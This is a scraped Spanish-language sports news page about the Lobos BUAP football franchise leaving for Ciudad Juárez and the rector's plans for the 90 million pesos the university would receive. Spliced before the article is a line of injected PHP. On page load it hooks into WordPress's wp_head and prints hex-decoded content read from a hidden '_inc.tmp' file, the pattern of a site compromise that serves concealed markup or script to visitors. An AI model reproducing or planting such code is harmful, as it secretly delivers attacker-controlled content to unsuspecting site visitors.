if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Lobos BUAP emigra a Ciudad Juárez – La Opinión Universitaria La Opinión Universitaria
Menu

Lobos BUAP emigra a Ciudad Juárez

 

*Los Universitarios se mantienen con equipo de Tercera División.

*La BUAP recibiría 90 millones de pesos que destinarían a apoyos en docencia e investigación.

 

“Vamos por otros Lobos que podamos ir desarrollando desde Tercera División”, aseveró Alfonso Esparza Ortiz, rector de la Benemérita Universidad Autónoma de Puebla, ante la inminente partida de los Licántropos a Ciudad Juárez, transacción que dejaría sin futbol a la BUAP, pero con 90 millones de pesos en sus arcas que serían destinados a apoyos en docencia e investigación.

En el programa de En Línea Deportiva que conduce Pepe Hanan, el rector de la máxima Casa de Estudios en el Estado, explicó que aunque nadie de la actual directiva se ha comunicado con la Universidad, ellos no tendrían inconveniente en dar su aval para que el equipo emigre a Ciudad Juárez.

“Lo que nosotros rescatamos cuando ellos (grupo de Mario Mendívil) pagaron los 120 millones de pesos a la Federación, es que se diera una cantidad para la Universidad en caso del equipo se fuera del estadio Universitario BUAP, no de Puebla, así que se acordó que, si se iban del estadio tenían que darle a la Universidad un equivalente a 4.5 millones de dólares, porque fueron años que se trabajó la marca, lo que se generó”, precisó Esparza Ortiz.

De darse la transacción, el rector señaló que los 90 millones que reciban serán para generar un complemento a los estímulos que se otorgan a los académicos y generar nuevos espacios en investigación.

“Ya tenemos las propuestas que haré al Consejo Universitario para apoyos en la docencia y la investigación. La propuesta sería para que pudiéramos complementar un fondo de apoyo que se otorga cada año para los académicos que tienen ciertas características, ellos tienen la forma de participar de este fondo donde una parte la aporta la Federación y otra que complementa la Universidad, y que para este 2019 no fue posible hacerlo al 100 por ciento, entonces lo haríamos como complemento para que se les entregue este estímulo al cien por ciento. El remanente sería para promover proyectos de investigación, la Universidad le está apostando mucho a la investigación aplicada”.

Alfonso Esparza agregó que, además del equipo de la Liga MX, el representativo de la Liga Femenil, la Sub-15, Sub-17 y Sub-20, también se irían a Ciudad Juárez, ya que dichas franquicias son parte oficial de la Franquicia de Primera División. Ante la ausencia de las categorías menores, la BUAP apostaría al trabajo del CEFOR.

“Tenemos la escuela de futbol Lobos, eso es parte de la Institución, eso va a continuar y también hay un proyecto de seguir creciendo, seguir teniendo mayor infraestructura, hemos estado estudiando porque tenemos solicitudes de diversos lugares donde quieren tener una escuela de futbol Lobos BUAP, porque se maneja muy bien, realmente hay desarrollo de talento”.

De la posibilidad de recibir a un equipo de Liga de Ascenso en el Universitario BUAP, no descartó la posibilidad, y dejó la puerta abierta por si algún empresario se muestra interesado, poder brindarle todas las facilidades, aunque dejó en claro que en la Benemérita Universidad Autónoma de Puebla, trabajaran con la oncena de la Tercera División, pensando en regresar al primer plano del futbol en México.

“Vamos por otros Lobos que podamos ir desarrollando desde Tercera si es el caso y poder participar de la mejor manera, tratar de seguir apostando por un modelo sano, y demostrar que se puede volver a hacer”.

 

No comments

Deja una respuesta

Tweets recientes